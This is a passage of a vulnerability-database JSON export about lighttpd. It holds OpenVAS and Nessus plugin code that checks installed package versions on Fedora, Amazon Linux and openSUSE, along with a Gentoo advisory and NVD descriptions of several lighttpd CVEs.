http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(866877);\n script_version(\"$Revision: 8542 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-26 07:57:28 +0100 (Fri, 26 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-06 09:36:03 +0530 (Fri, 06 Sep 2013)\");\n script_cve_id(\"CVE-2012-5533\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for lighttpd FEDORA-2013-15345\");\n\n tag_insight = \"Secure, fast, compliant and very flexible web-server which has been optimized\nfor high-performance environments. It has a very low memory footprint compared\nto other webservers and takes care of cpu-load. 
Its advanced feature-set\n(FastCGI, CGI, Auth, Output-Compression, URL-Rewriting and many more) make\nit the perfect webserver-software for every server that is suffering load\nproblems.\n\";\n\n tag_affected = \"lighttpd on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-15345\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115116.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of lighttpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.32~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:20", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2019-05-10T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120553", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120553", "title": "Amazon Linux Local Check: ALAS-2013-179", "type": "openvas", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2013-179.nasl 6577 2017-07-06 13:43:46Z cfischer$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120553\");\n script_version(\"2019-05-10T14:24:23+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:29:28 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2019-05-10 14:24:23 +0000 (Fri, 10 May 2019)\");\n script_name(\"Amazon Linux Local Check: ALAS-2013-179\");\n script_tag(name:\"insight\", value:\"The http_request_split_value function in request.c in lighttpd before 1.4.32 allows\n remote attackers to cause a denial of service (infinite loop) via a request with a header containing an empty token,\n as demonstrated using the Connection: TE, , Keep-Alive header.\");\n script_tag(name:\"solution\", value:\"Run yum update lighttpd to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", 
value:\"https://alas.aws.amazon.com/ALAS-2013-179.html\");\n script_cve_id(\"CVE-2012-5533\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"lighttpd-mod_geoip\", rpm:\"lighttpd-mod_geoip~1.4.31~1.5.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"lighttpd-debuginfo\", rpm:\"lighttpd-debuginfo~1.4.31~1.5.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.31~1.5.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"lighttpd-mod_mysql_vhost\", rpm:\"lighttpd-mod_mysql_vhost~1.4.31~1.5.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"lighttpd-fastcgi\", rpm:\"lighttpd-fastcgi~1.4.31~1.5.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:42", "bulletinFamily": "unix", "description": "### Background\n\nlighttpd is a lightweight high-performance web server.\n\n### Description\n\nMultiple vulnerabilities have been discovered in lighttpd. 
Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could create a Denial of Service condition. Furthermore, a remote attacker may be able to execute arbitrary SQL statements. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll lighttpd users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-servers/lighttpd-1.4.35\"", "modified": "2014-06-13T00:00:00", "published": "2014-06-13T00:00:00", "id": "GLSA-201406-10", "href": "https://security.gentoo.org/glsa/201406-10", "type": "gentoo", "title": "lighttpd: Multiple vulnerabilities", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2019-05-29T18:12:26", "bulletinFamily": "NVD", "description": "The http_request_split_value function in request.c in lighttpd before 1.4.32 allows remote attackers to cause a denial of service (infinite loop) via a request with a header containing an empty token, as demonstrated using the \"Connection: TE,,Keep-Alive\" header.\nPer: http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2012_01.txt\r\n\r\n\" Affected versions\r\n-------------------\r\n\r\nOnly 1.4.31; on the other hand versions before 1.4.31 include the \"invalid read\" bug.\"", "modified": "2017-08-29T01:32:00", "id": "CVE-2012-5533", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5533", "published": "2012-11-24T20:55:00", "title": "CVE-2012-5533", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:11:25", "bulletinFamily": "NVD", "description": "Integer signedness error in the base64_decode function in the HTTP authentication functionality (http_auth.c) in lighttpd 1.4 before 1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to cause a denial of service (segmentation fault) via crafted base64 input that triggers an 
out-of-bounds read with a negative index.", "modified": "2018-11-29T14:38:00", "id": "CVE-2011-4362", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4362", "published": "2011-12-24T19:55:00", "title": "CVE-2011-4362", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:13:44", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name, related to request_check_hostname.", "modified": "2016-08-23T02:07:00", "id": "CVE-2014-2323", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2323", "published": "2014-03-14T15:55:00", "title": "CVE-2014-2323", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:13:04", "bulletinFamily": "NVD", "description": "lighttpd before 1.4.33 does not check the return value of the (1) setuid, (2) setgid, or (3) setgroups functions, which might cause lighttpd to run as root if it is restarted and allows remote attackers to gain privileges, as demonstrated by multiple calls to the clone function that cause setuid to fail when the user process limit is reached.", "modified": "2016-12-08T03:03:00", "id": "CVE-2013-4559", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4559", "published": "2013-11-20T14:12:00", "title": "CVE-2013-4559", "type": "cve", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:13:04", "bulletinFamily": "NVD", "description": "Use-after-free vulnerability in lighttpd before 1.4.33 allows remote attackers to cause a denial of service (segmentation fault and crash) via unspecified vectors that trigger FAMMonitorDirectory failures.", "modified": "2016-12-08T03:03:00", "id": "CVE-2013-4560", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4560", "published": 
"2013-11-20T14:12:00", "title": "CVE-2013-4560", "type": "cve", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:13:04", "bulletinFamily": "NVD", "description": "lighttpd before 1.4.34, when SNI is enabled, configures weak SSL ciphers, which makes it easier for remote attackers to hijack sessions by inserting packets into the client-server data stream or obtain sensitive information by sniffing the network.\nPer: http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2013_01.txt\n\n\"All versions from 1.4.24 (first version supporting SNI) up to and including\n1.4.33.\"", "modified": "2016-12-08T03:03:00", "id": "CVE-2013-4508", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4508", "published": "2013-11-08T04:47:00", "title": "CVE-2013-4508", "type": "cve", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}], "nessus": [{"lastseen": "2019-11-01T03:00:41", "bulletinFamily": "scanner", "description": " - added cve-2013-4508.patch and\n cve-2013-4508-regression-bug729480.patch: (bnc#849059)\n When defining an ssl.cipher-list, it works for the\n ", "modified": "2019-11-02T00:00:00", "id": "OPENSUSE-2014-43.NASL", "href": "https://www.tenable.com/plugins/nessus/75389", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : lighttpd (openSUSE-SU-2014:0072-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-43.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75389);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/11/10 11:50:02\");\n\n script_cve_id(\"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\");\n script_bugtraq_id(63534, 63686, 63688);\n\n script_name(english:\"openSUSE Security Update : lighttpd (openSUSE-SU-2014:0072-1)\");\n 
script_summary(english:\"Check for the openSUSE-2014-43 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - added cve-2013-4508.patch and\n cve-2013-4508-regression-bug729480.patch: (bnc#849059)\n When defining an ssl.cipher-list, it works for the\n 'default' HTTPS setup ($SERVER['socket'] 443 block), but\n when you utilize SNI ($HTTP['host'] blocks within the\n $SERVER['socket'] block) the ssl.cipher-list seems to\n not inherit into the host blocks and instead will\n default to include all of the available openssl ciphers\n (except SSL v2/v3 based if those are disabled)\n\n - added cve-2013-4559.patch (bnc#850468) check success of\n setuid,setgid,setgroups\n\n - added cve-2013-4560.patch (bnc#850469) FAM: fix use\n after free\n\n - added cve-2013-4508.patch and\n cve-2013-4508-regression-bug729480.patch: (bnc#849059)\n When defining an ssl.cipher-list, it works for the\n 'default' HTTPS setup ($SERVER['socket'] 443 block), but\n when you utilize SNI ($HTTP['host'] blocks within the\n $SERVER['socket'] block) the ssl.cipher-list seems to\n not inherit into the host blocks and instead will\n default to include all of the available openssl ciphers\n (except SSL v2/v3 based if those are disabled)\n\n - added cve-2013-4559.patch (bnc#850468) check success of\n setuid,setgid,setgroups\n\n - added cve-2013-4560.patch (bnc#850469) FAM: fix use\n after free\n\n - added cve-2013-4508.patch and\n cve-2013-4508-regression-bug729480.patch: (bnc#849059)\n When defining an ssl.cipher-list, it works for the\n 'default' HTTPS setup ($SERVER['socket'] 443 block), but\n when you utilize SNI ($HTTP['host'] blocks within the\n $SERVER['socket'] block) the ssl.cipher-list seems to\n not inherit into the host blocks and instead will\n default to include all of the available openssl ciphers\n (except SSL v2/v3 based if those are 
disabled)\n\n - added cve-2013-4559.patch (bnc#850468) check success of\n setuid,setgid,setgroups\n\n - added cve-2013-4560.patch (bnc#850469) FAM: fix use\n after free\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=849059\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=850468\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=850469\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-01/msg00049.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected lighttpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_cml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_cml-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_geoip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_geoip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_magnet\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_magnet-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_webdav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_webdav-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.2|SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.2 / 12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-debuginfo-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-debugsource-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_cml-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_cml-debuginfo-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_geoip-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_geoip-debuginfo-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_magnet-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_magnet-debuginfo-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_mysql_vhost-1.4.31-4.13.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_mysql_vhost-debuginfo-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_rrdtool-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_rrdtool-debuginfo-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_trigger_b4_dl-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_trigger_b4_dl-debuginfo-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_webdav-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_webdav-debuginfo-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-debuginfo-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-debugsource-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-mod_cml-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-mod_cml-debuginfo-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-mod_geoip-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-mod_geoip-debuginfo-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-mod_magnet-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-mod_magnet-debuginfo-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-mod_mysql_vhost-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-mod_mysql_vhost-debuginfo-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-mod_rrdtool-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", 
reference:\"lighttpd-mod_rrdtool-debuginfo-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-mod_trigger_b4_dl-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-mod_trigger_b4_dl-debuginfo-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-mod_webdav-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-mod_webdav-debuginfo-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-debuginfo-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-debugsource-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_cml-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_cml-debuginfo-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_geoip-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_geoip-debuginfo-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_magnet-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_magnet-debuginfo-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_mysql_vhost-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_mysql_vhost-debuginfo-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_rrdtool-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_rrdtool-debuginfo-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_trigger_b4_dl-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_trigger_b4_dl-debuginfo-1.4.32-2.5.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_webdav-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_webdav-debuginfo-1.4.32-2.5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd / lighttpd-debuginfo / lighttpd-debugsource / etc\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:27:15", "bulletinFamily": "scanner", "description": "Enable building with PIE Latest upstream, multiple security fixes.\n\nhttp://www.lighttpd.net/2014/1/20/1-4-34/ Latest upstream, multiple\nsecurity fixes.\n\nhttp://www.lighttpd.net/2014/1/20/1-4-34/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2014-2495.NASL", "href": "https://www.tenable.com/plugins/nessus/72651", "published": "2014-02-24T00:00:00", "title": "Fedora 20 : lighttpd-1.4.34-3.fc20 (2014-2495)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-2495.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72651);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/12/05 20:31:22\");\n\n script_cve_id(\"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\");\n script_bugtraq_id(63534, 63686, 63688);\n script_xref(name:\"FEDORA\", value:\"2014-2495\");\n\n script_name(english:\"Fedora 20 : lighttpd-1.4.34-3.fc20 (2014-2495)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Enable building with PIE Latest upstream, multiple security fixes.\n\nhttp://www.lighttpd.net/2014/1/20/1-4-34/ Latest upstream, multiple\nsecurity fixes.\n\nhttp://www.lighttpd.net/2014/1/20/1-4-34/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.lighttpd.net/2014/1/20/1-4-34/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1026567\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1026568\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1029666\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1029667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=879185\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=955145\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=994444\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128980.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8a292323\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected lighttpd package.\"\n );\n 